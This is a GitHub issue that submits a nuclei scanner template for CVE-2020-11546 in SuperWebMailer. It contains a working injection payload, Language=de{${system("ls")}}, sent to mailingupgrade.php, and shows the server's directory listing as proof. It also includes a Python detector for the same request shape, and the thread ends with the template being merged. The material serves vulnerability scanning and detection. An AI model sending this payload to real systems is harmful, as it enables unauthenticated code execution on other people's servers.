projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

CVE-2020-11546 #3433

Closed Official-BlackHat13 closed 2 years ago

Official-BlackHat13 commented 2 years ago

Template Information:

SuperWebMailer Remote Code Execution

Description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.

Reference:

Nuclei Template:

id: CVE-2020-11546

info:
  author: Official_BlackHat13
  severity: critical
  name: SuperWebmailer Remote Code Execution
  description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
  tags: cve,cve2020,rce,superwebmailer
  reference:
    - https://github.com/Official-BlackHat13/CVE-2020-11546/
    - https://blog.to.com/advisory-superwebmailer-cve-2020-11546/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11546
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11546
    cwe-id: CWE-94

requests:
  - raw:
      - |
        POST /{{path}}mailingupgrade.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded

        step=1&Language=de{${system("ls")}}&NextBtn=Weiter+%3E

    # Candidate install directories; each value is substituted into {{path}} in
    # the raw request above, so one request is sent per entry.
    payloads:
      path:
        - superwebmailer/
        - newsletter/swm/
        - swm/

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - ajax_ccea.php
          - ajax_getemailingactions.php
          - ajax_getemailtemplates.php

Result

naedit.php                                                                                                                                                             
newlocalmessage.php                                                                                                                                                    
newsletter_templates                                                                                                                                                   
newslettersubunsub_ops.inc.php                                                                                                                                         
newslettersubunsubcheck.inc.php                                                                                                                                        
nl.php                                                                                                                                                                 
nlu.php                                                                                                                                                                
onlineupdate.inc.php                                                                                                                                                   
ostat.php                                                                                                                                                              
outqueue_ops.inc.php                                                                                                                                                   
ownaccountedit.php                                                                                                                                                     
pageedit.php                                                                                                                                                           
pdf.inc.php                                                                                                                                                            
persattachmentsaddedit.php                                                                                                                                             
php_register_globals_off.inc.php                                                                                                                                       
phpcompat.php                                                                                                                                                          
phpinfo.php                                                                                                                                                            
plaintexttemplates.php                                                                                                                                                 
plugins                                                                                                                                                                
profile.php                                                                                                                                                            
pw_reminder.php                                                                                                                                                        
rcptscolumns.php                                                                                                                                                       
reasonforunsubscriptionedit.php                                                                                                                                        
reasonsforunsubscription_vote.php                                                                                                                                      
recipientedit.php                                                                                                                                                      
recipients_ops.inc.php                                                                                                                                                 
removeautoimport.inc.php                                                                                                                                               
removeautoresponder.inc.php                                                                                                                                            
removebirthdayresponder.inc.php                                                                                                                                        
removeform.inc.php                                                                                                                                                     
removefuresponder.inc.php                                                                                                                                              
removeinbox.inc.php                                                                                                                                                    
removemessage.inc.php                                                                                                                                                  
removemta.inc.php                                                                                                                                                      
removena.inc.php                                                                                                                                                       
removepage.inc.php                                                                                                                                                     
removerss2emailresponder.inc.php                                                                                                                                       
replacements.inc.php                                                                                                                                                   
responderpreview.php                                                                                                                                                   
responders_cleanup.inc.php                                                                                                                                             
responderselect.inc.php                                                                                                                                                
ressources.inc.php                                                                                                                                                     
ressources_array_access.inc.php                                                                                                                                        
robots.txt                                                                                                                                                             
rss2emailreplacements.inc.php                                                                                                                                          
rss2emailresponderedit.php                                                                                                                                             
rss2emailtemplate                                                                                                                                                      
rssparser.php                                                                                                                                                          
sanitize.inc.php                                                                                                                                                       
savedoptions.inc.php                                                                                                                                                   
searchrecipients.php                                                                                                                                                   
searchrecipients_ops.inc.php                                                                                                                                           
securitycheck.inc.php                                                                                                                                                  
sendmail_mt.php                                                                                                                                                        
serialmailpreview.php                                                                                                                                                  
serialmailpreviewitem.php                                                                                                                                              
sessioncheck.inc.php                                                                                                                                                   
settings_authsettings.php                                                                                                                                              
settings_branding.php                                                                                                                                                  
settings_cron.php                                                                                                                                                      
settings_db.php                                                                                                                                                        
settings_editfields.php                                                                                                                                                
settings_preferences.php                                                                                                                                               
settings_test.php                                                                                                                                                      
sha1.php                                                                                                                                                               
show_facebookpostdlg.php                                                                                                                                               
show_na.php                                                                                                                                                            
show_saved_data.php                                                                                                                                                    
show_twitterpostdlg.php                                                                                                                                                
showstatsummary.php                                                                                                                                                    
smscampaign_ops.inc.php                                                                                                                                                
smscampaigncreate.php                                                                                                                                                  
smscampaignedit.php                                                                                                                                                    
smscampaignlivesend.php                                                                                                                                                
smscampaignsendstatselect.inc.php                                                                                                                                      
smscampaignstools.inc.php                                                                                                                                              
smsout.inc.php                                                                                                                                                         
spamtest_external.php                                                                                                                                                  
splittest_ops.inc.php                                                                                                                                                  
splittestcreate.php                                                                                                                                                    
splittestedit.php                                                                                                                                                      
splitteststools.inc.php                                                                                                                                                
sql                                                                                                                                                                    
stat_autoresponderlog.php                                                                                                                                              
stat_birthdayresponderlog.php                                                                                                                                          
stat_campaign_overlay.php                                                                                                                                              
stat_campaign_overlay_getclicks.php                                                                                                                                    
stat_campaignlog.php                                                                                                                                                   
stat_campaigntracking.php                                                                                                                                              
stat_campaigntracking_geo.php                                                                                                                                          
stat_campaigntracking_iframe_geo.php                                                                                                                                   
stat_campaigntracking_recipients.php                                                                                                                                   
stat_distriblistlog.php                                                                                                                                                
stat_furesponderlog.php                                                                                                                                                
stat_processlog.php                                                                                                                                                    
stat_respondertracking.php                                                                                                                                             
stat_respondertracking_geo.php                                                                                                                                         
stat_respondertracking_iframe_geo.php                                                                                                                                  
stat_respondertracking_recipients.php                                                                                                                                  
stat_rss2emailresponderlog.php                                                                                                                                         
stat_sentmails.php                                                                                                                                                     
stat_smscampaignlog.php                                                                                                                                                
stat_splittestlog.php                                                                                                                                                  
stat_splittesttracking.php                                                                                                                                             
superadmin.inc.php                                                                                                                                                     
superadmincreate.php                                                                                                                                                   
supermailer_import.php                                                                                                                                                 
supermailer_upload.php                                                                                                                                                 
targetgroupedit.php                                                                                                                                                    
targetgroups.inc.php                                                                                                                                                   
templateedit.php                                                                                                                                                       
templates                                                                                                                                                              
templates.inc.php                                                                                                                                                      
test.php                                                                                                                                                               
textblockedit.php                                                                                                                                                      
tracking_inst.inc.php                                                                                                                                                  
twitter.inc.php                                                                                                                                                        
twitterauth.php                                                                                                                                                        
twitterconfig.inc.php                                                                                                                                                  
twittersend.php                                                                                                                                                        
upgrade_done.php                                                                                                                                                       
userdefined.inc.php                                                                                                                                                    
userfiles                                                                                                                                                              
users_ops.inc.php                                                                                                                                                      
usersedit.php                                                                                                                                                          
utf8converter.inc.php                                                                                                                                                  
version.inc.php                                                                                                                                                        
wordpress                                                                                                                                                              
wrapper
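The listing above is the output of the `system("ls")` call injected through the `Language` parameter of `mailingupgrade.php`. As an added example (not part of the original issue, the nuclei template, or SuperWebMailer itself), the following Python check flags the published payload shape on the wire: a request to `mailingupgrade.php` whose URL-decoded `Language` value contains PHP's `{$` / `${` interpolation syntax, which a real language code such as `de` never does. The two paths are the ones from the template's payload list; the host name and the sample requests are constructed for this example.

```python
"""
Request check for the CVE-2020-11546 injection shape.

Added example, not part of the original issue or of the nuclei template.
The template posts to mailingupgrade.php with

    step=1&Language=de{${system("ls")}}&NextBtn=Weiter+%3E

A legitimate Language value is a short code such as "de" or "en", so PHP's
"{$" / "${" interpolation openers inside it are a reliable indicator of this
attempt. Sample requests are constructed here; the host name is an assumption.
"""
import re
from urllib.parse import parse_qs, urlsplit

# PHP complex (curly) string-interpolation openers: "{$" and "${".
PHP_INTERPOLATION = re.compile(r"\{\s*\$|\$\s*\{")


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def language_values(raw: str):
    """URL-decoded 'Language' values sent to mailingupgrade.php (empty for other endpoints)."""
    method, target, headers, body = parse_raw_request(raw)
    parts = urlsplit(target)
    if not parts.path.endswith("/mailingupgrade.php"):
        return []
    # parse_qs percent-decodes, so an encoded %7B%24%7B is seen as "{${".
    params = parse_qs(parts.query, keep_blank_values=True)
    if method == "POST" and headers.get("content-type", "").startswith(
        "application/x-www-form-urlencoded"
    ):
        for key, vals in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(vals)
    return params.get("Language", [])


def is_cve_2020_11546_attempt(raw: str) -> bool:
    """True when a Language value for mailingupgrade.php carries PHP interpolation syntax."""
    return any(PHP_INTERPOLATION.search(v) for v in language_values(raw))


def build_post(path: str, body: str) -> str:
    """Constructed sample request; the host name is an assumption."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        "Host: mail.example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


# Payload exactly as in the nuclei template, under the template's first path.
EXPLOIT_REQUEST = build_post(
    "/superwebmailer/mailingupgrade.php",
    'step=1&Language=de{${system("ls")}}&NextBtn=Weiter+%3E',
)
# Same injection, percent-encoded the way a browser or HTTP library would send it.
ENCODED_REQUEST = build_post(
    "/newsletter/swm/mailingupgrade.php",
    "step=1&Language=de%7B%24%7Bsystem%28%22ls%22%29%7D%7D&NextBtn=Weiter+%3E",
)
# A legitimate upgrade-wizard submission.
BENIGN_REQUEST = build_post(
    "/superwebmailer/mailingupgrade.php",
    "step=1&Language=de&NextBtn=Weiter+%3E",
)
# Same Language value against a different script: not this CVE's shape.
OTHER_ENDPOINT = build_post(
    "/superwebmailer/profile.php",
    'Language=de{${system("ls")}}',
)

if __name__ == "__main__":
    for name, req in [("exploit", EXPLOIT_REQUEST), ("encoded", ENCODED_REQUEST),
                      ("benign", BENIGN_REQUEST), ("other endpoint", OTHER_ENDPOINT)]:
        print(f"{name:15s} -> {is_cve_2020_11546_attempt(req)}")
```

Two caveats for anyone deploying this: it matches the published payload shape, not every way of getting PHP code through this parameter, so it is a detection aid and not a substitute for upgrading SuperWebMailer; and ordinary access logs do not retain POST bodies, so the check has to run where the full request is visible (a WAF, a reverse proxy, or a full-request capture).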
ehsandeep commented 2 years ago

Thank you for sharing this @Official-BlackHat13, this is now added into the project with the linked PR.